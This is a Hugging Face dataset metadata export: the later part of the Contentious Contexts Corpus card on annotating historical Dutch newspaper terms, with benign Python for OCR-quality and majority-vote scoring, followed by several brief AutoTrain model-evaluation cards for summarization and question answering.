> - 'Niet omstreden'(Not contentious)
> - 'Weet ik niet'(I don't know)
> - 'Onleesbare OCR'(Illegible OCR)<br>
2 open fields
> - 'Andere omstreden termen in de context'(Other contentious terms in the context)
> - 'Notities'(Notes)<br>
and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:
> - The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;
> - The context window of 5 sentences per sample was found optimal;
> - The number of samples per annotator was increased to 50;
> - The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;
> - The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);
> - The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;
> - Another open question was added at the end of the annotation asking how much time it took to complete the annotation.
#### Who are the annotators?
Volunteers and Expert annotators
### Personal and Sensitive Information
[N/A]
## Considerations for Using the Data
## Accessing the annotations
Each example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.
An example of how one could generate an "OCR quality rating" based on the number of times an annotator labelled an example with `Illegible OCR`:
```python
from collections import Counter

def calculate_ocr_score(example):
    # Fraction of annotators who did *not* mark the extract as "Illegible OCR".
    annotator_responses = [response["response"] for response in example["annotator_responses_english"]]
    counts = Counter(annotator_responses)
    bad_ocr_ratings = counts.get("Illegible OCR", 0)  # default of 0 avoids the None check
    return round(1 - bad_ocr_ratings / len(annotator_responses), 3)

dataset = dataset.map(lambda example: {"ocr_score": calculate_ocr_score(example)})
```
To take the majority vote (or return a tie) based on whether an example is labelled contentious or not:
```python
from collections import Counter

def most_common_vote(example):
    # Majority vote over the contentiousness labels; ties are reported explicitly.
    annotator_responses = [response["response"] for response in example["annotator_responses_english"]]
    counts = Counter(annotator_responses)
    contentious_count = counts.get("Contentious according to current standards", 0)
    not_contentious_count = counts.get("Not contentious", 0)
    if contentious_count > not_contentious_count:
        return "contentious"
    if contentious_count < not_contentious_count:
        return "not_contentious"
    return "tied"
```
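The vote can then be attached to each example in the same way as the OCR score (the column name `majority_vote` is an arbitrary choice):
```python
dataset = dataset.map(lambda example: {"majority_vote": most_common_vote(example)})
```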
### Social Impact of Dataset
This dataset can be used to see how words change in meaning over time.
### Discussion of Biases
> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.
Since this project was explicitly created to help assess bias, it should be used primarily in the context of assessing bias and methods for detecting bias.
### Other Known Limitations
[Needs More Information]
## Additional Information
### Dataset Curators
[Cultural AI](https://github.com/cultural-ai)
### Licensing Information
CC-BY
### Citation Information
```
@misc{ContentiousContextsCorpus2021,
author = {Cultural AI},
title = {Contentious Contexts Corpus},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/cultural-ai/ConConCor}},
}
``` | biglam/contentious_contexts | [
"task_categories:text-classification",
"task_ids:sentiment-scoring",
"task_ids:multi-label-classification",
"annotations_creators:expert-generated",
"annotations_creators:crowdsourced",
"language_creators:machine-generated",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:nl",
"license:cc-by-2.0",
"newspapers",
"historic",
"dutch",
"problematic",
"ConConCor",
"region:us"
] | 2022-07-26T21:07:48+00:00 | {"annotations_creators": ["expert-generated", "crowdsourced"], "language_creators": ["machine-generated"], "language": ["nl"], "license": ["cc-by-2.0"], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["text-classification"], "task_ids": ["sentiment-scoring", "multi-label-classification"], "pretty_name": "Contentious Contexts Corpus", "tags": ["newspapers", "historic", "dutch", "problematic", "ConConCor"]} | 2022-08-01T16:02:11+00:00 | [] | [
"nl"
] | TAGS
#task_categories-text-classification #task_ids-sentiment-scoring #task_ids-multi-label-classification #annotations_creators-expert-generated #annotations_creators-crowdsourced #language_creators-machine-generated #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-original #language-Dutch #license-cc-by-2.0 #newspapers #historic #dutch #problematic #ConConCor #region-us
| Dataset Card for Contentious Contexts Corpus
============================================
Table of Contents
-----------------
* Dataset Description
+ Dataset Summary
+ Supported Tasks
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
Dataset Description
-------------------
* Homepage: ConConCor
* Repository: ConConCor
* Paper: [N/A]
* Leaderboard: [N/A]
* Point of Contact: Jacco van Ossenbruggen
Note One can also find a Datasheet produced by the creators of this dataset as a PDF document
### Dataset Summary
This dataset contains extracts from historical Dutch newspapers containing keywords of potentially contentious words (according to present-day sensibilities). The dataset contains multiple annotations per instance, given the option to quantify agreement scores for annotations. This dataset can be used to track how words and their meanings have changed over time
### Supported Tasks and Leaderboards
* 'text-classification': This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time
### Languages
The text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is 'nl'
Dataset Structure
-----------------
### Data Instances
### Data Fields
### Data Splits
Train: 2720
Dataset Creation
----------------
### Curation Rationale
>
> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term "contentious" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they "explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives", meanwhile "keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection". There is a page on the institution website where people can report "offensive language".
>
>
>
### Source Data
#### Initial Data Collection and Normalization
>
> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as "article", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.
>
>
>
#### Who are the source language producers?
[N/A]
### Annotations
#### Annotation process
>
> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the "Prolific" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample
>
>
> * 'Omstreden'(Contentious)
> * 'Niet omstreden'(Not contentious)
> * 'Weet ik niet'(I don't know)
> * 'Onleesbare OCR'(Illegible OCR)
> 2 open fields
> * 'Andere omstreden termen in de context'(Other contentious terms in the context)
> * 'Notities'(Notes)
> and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:
> * The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;
> * The context window of 5 sentences per sample was found optimal;
> * The number of samples per annotator was increased to 50;
> * The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;
> * The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);
> * The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;
> * Another open question was added at the end of the annotation asking how much time it took to complete the annotation.
>
>
>
#### Who are the annotators?
Volunteers and Expert annotators
### Personal and Sensitive Information
[N/A]
Considerations for Using the Data
---------------------------------
Accessing the annotations
-------------------------
Each example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.
An example of how one could generate an "OCR quality rating" based on the number of times an annotator labelled an example with 'Illegible OCR':
To take the majority vote (or return a tie) based on whether a example is labelled contentious or not:
### Social Impact of Dataset
This dataset can be used to see how words change in meaning over time
### Discussion of Biases
>
> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.
>
>
>
Since this project was explicitly created to help assess bias, it should be used primarily in the context of assess bias, and methods for detecting bias.
### Other Known Limitations
Additional Information
----------------------
### Dataset Curators
Cultural AI
### Licensing Information
CC-BY
| [
"### Dataset Summary\n\n\nThis dataset contains extracts from historical Dutch newspapers containing keywords of potentially contentious words (according to present-day sensibilities). The dataset contains multiple annotations per instance, given the option to quantify agreement scores for annotations. This dataset can be used to track how words and their meanings have changed over time",
"### Supported Tasks and Leaderboards\n\n\n* 'text-classification': This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time",
"### Languages\n\n\nThe text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is 'nl'\n\n\nDataset Structure\n-----------------",
"### Data Instances",
"### Data Fields",
"### Data Splits\n\n\nTrain: 2720\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\n\n> \n> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term \"contentious\" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they \"explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives\", meanwhile \"keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection\". There is a page on the institution website where people can report \"offensive language\".\n> \n> \n>",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\n\n> \n> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as \"article\", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.\n> \n> \n>",
"#### Who are the source language producers?\n\n\n[N/A]",
"### Annotations",
"#### Annotation process\n\n\n\n> \n> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the \"Prolific\" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample\n> \n> \n> * 'Omstreden'(Contentious)\n> * 'Niet omstreden'(Not contentious)\n> * 'Weet ik niet'(I don't know)\n> * 'Onleesbare OCR'(Illegible OCR)\n> 2 open fields\n> * 'Andere omstreden termen in de context'(Other contentious terms in the context)\n> * 'Notities'(Notes)\n> and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:\n> * The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;\n> * The context window of 5 sentences per sample was found optimal;\n> * The number of samples per annotator was increased to 50;\n> * The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;\n> * The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);\n> * The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;\n> * Another open question was added at the end of the annotation asking how much time it took to complete the annotation.\n> \n> \n>",
"#### Who are the annotators?\n\n\nVolunteers and Expert annotators",
"### Personal and Sensitive Information\n\n\n[N/A]\n\n\nConsiderations for Using the Data\n---------------------------------\n\n\nAccessing the annotations\n-------------------------\n\n\nEach example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.\n\n\nAn example of how one could generate an \"OCR quality rating\" based on the number of times an annotator labelled an example with 'Illegible OCR':\n\n\nTo take the majority vote (or return a tie) based on whether a example is labelled contentious or not:",
"### Social Impact of Dataset\n\n\nThis dataset can be used to see how words change in meaning over time",
"### Discussion of Biases\n\n\n\n> \n> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.\n> \n> \n> \n\n\nSince this project was explicitly created to help assess bias, it should be used primarily in the context of assess bias, and methods for detecting bias.",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\nCultural AI",
"### Licensing Information\n\n\nCC-BY"
] | [
"TAGS\n#task_categories-text-classification #task_ids-sentiment-scoring #task_ids-multi-label-classification #annotations_creators-expert-generated #annotations_creators-crowdsourced #language_creators-machine-generated #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-original #language-Dutch #license-cc-by-2.0 #newspapers #historic #dutch #problematic #ConConCor #region-us \n",
"### Dataset Summary\n\n\nThis dataset contains extracts from historical Dutch newspapers containing keywords of potentially contentious words (according to present-day sensibilities). The dataset contains multiple annotations per instance, given the option to quantify agreement scores for annotations. This dataset can be used to track how words and their meanings have changed over time",
"### Supported Tasks and Leaderboards\n\n\n* 'text-classification': This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time",
"### Languages\n\n\nThe text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is 'nl'\n\n\nDataset Structure\n-----------------",
"### Data Instances",
"### Data Fields",
"### Data Splits\n\n\nTrain: 2720\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\n\n> \n> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term \"contentious\" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they \"explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives\", meanwhile \"keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection\". There is a page on the institution website where people can report \"offensive language\".\n> \n> \n>",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\n\n> \n> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as \"article\", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.\n> \n> \n>",
"#### Who are the source language producers?\n\n\n[N/A]",
"### Annotations",
"#### Annotation process\n\n\n\n> \n> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the \"Prolific\" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample\n> \n> \n> * 'Omstreden'(Contentious)\n> * 'Niet omstreden'(Not contentious)\n> * 'Weet ik niet'(I don't know)\n> * 'Onleesbare OCR'(Illegible OCR)\n> 2 open fields\n> * 'Andere omstreden termen in de context'(Other contentious terms in the context)\n> * 'Notities'(Notes)\n> and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:\n> * The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;\n> * The context window of 5 sentences per sample was found optimal;\n> * The number of samples per annotator was increased to 50;\n> * The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;\n> * The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);\n> * The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;\n> * Another open question was added at the end of the annotation asking how much time it took to complete the annotation.\n> \n> \n>",
"#### Who are the annotators?\n\n\nVolunteers and Expert annotators",
"### Personal and Sensitive Information\n\n\n[N/A]\n\n\nConsiderations for Using the Data\n---------------------------------\n\n\nAccessing the annotations\n-------------------------\n\n\nEach example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.\n\n\nAn example of how one could generate an \"OCR quality rating\" based on the number of times an annotator labelled an example with 'Illegible OCR':\n\n\nTo take the majority vote (or return a tie) based on whether a example is labelled contentious or not:",
"### Social Impact of Dataset\n\n\nThis dataset can be used to see how words change in meaning over time",
"### Discussion of Biases\n\n\n\n> \n> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.\n> \n> \n> \n\n\nSince this project was explicitly created to help assess bias, it should be used primarily in the context of assess bias, and methods for detecting bias.",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\nCultural AI",
"### Licensing Information\n\n\nCC-BY"
] |
cde011e595294d34ae7c648fcf788b153e762256 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-9ce97676-11915596 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T00:53:03+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-28T04:35:44+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
9ed5cb6a383d487c045f685388b32a12a5ad17c6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-3fbf83bf-11925597 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T00:57:53+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-28T04:57:02+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9\n* Dataset: kmfoda/booksum\n* Config: kmfoda--booksum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
0342260156e61cc56a6f59314d0d5b036b985a39 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/led-base-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-billsum-18299d18-11955600 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T02:49:36+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["billsum"], "eval_info": {"task": "summarization", "model": "pszemraj/led-base-book-summary", "metrics": [], "dataset_name": "billsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "text", "target": "summary"}}} | 2022-07-27T09:17:44+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/led-base-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/led-base-book-summary\n* Dataset: billsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/led-base-book-summary\n* Dataset: billsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
3ab156a12e3f1fecc0271712a0709c4ff979715f | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-billsum-a6bd4aa5-11965601 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T02:50:02+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["billsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-book-summary", "metrics": [], "dataset_name": "billsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "text", "target": "summary"}}} | 2022-07-27T20:10:35+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-book-summary\n* Dataset: billsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-book-summary\n* Dataset: billsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
eae636f52231308429ea7b022850ba84f4cfd02b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: nlpconnect/roberta-base-squad2-nq
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
